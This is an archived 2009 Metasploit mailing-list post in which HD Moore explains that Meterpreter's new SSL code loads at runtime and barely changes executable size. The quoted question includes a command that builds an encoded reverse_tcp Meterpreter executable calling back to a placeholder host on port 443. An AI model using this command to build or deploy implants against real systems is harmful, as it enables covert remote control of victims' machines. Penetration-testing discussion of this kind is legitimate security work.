Metasploit mailing list archives

Meterpreter + SSL

From: hdm at metasploit.com (HD Moore)
Date: Mon, 06 Jul 2009 22:20:55 -0500

On Mon, 06 Jul 2009 22:09:35 -0500, Willard Dawson
<wfdawson at bellsouth.net> wrote:

That's cool.  I wonder, though...

Today, for the first time in a week or more, I used msfencode and
shikata_ga_nai to make another instance of an .exe:

./msfpayload windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=443 R |
./msfencode -e x86/shikata_ga_nai -c 4 -t exe -o rv_443.exe

The resulting binary file was quite a bit larger than previously.

[..]

That is, it's feasible when the .scr file is only 112 lines, as was the
case until recently.  Now, my work results in a 600+ line file.  I
certainly
won't be manipulating that sort of file manually!

The generated executable size has only changed from ~9k to ~10k in the
recent months. The new SSL code is loaded at runtime over the network and
does not affect the size of the generated executable. It sounds like
something else may be the cause of the dramatic size increase you are
seeing.

-HD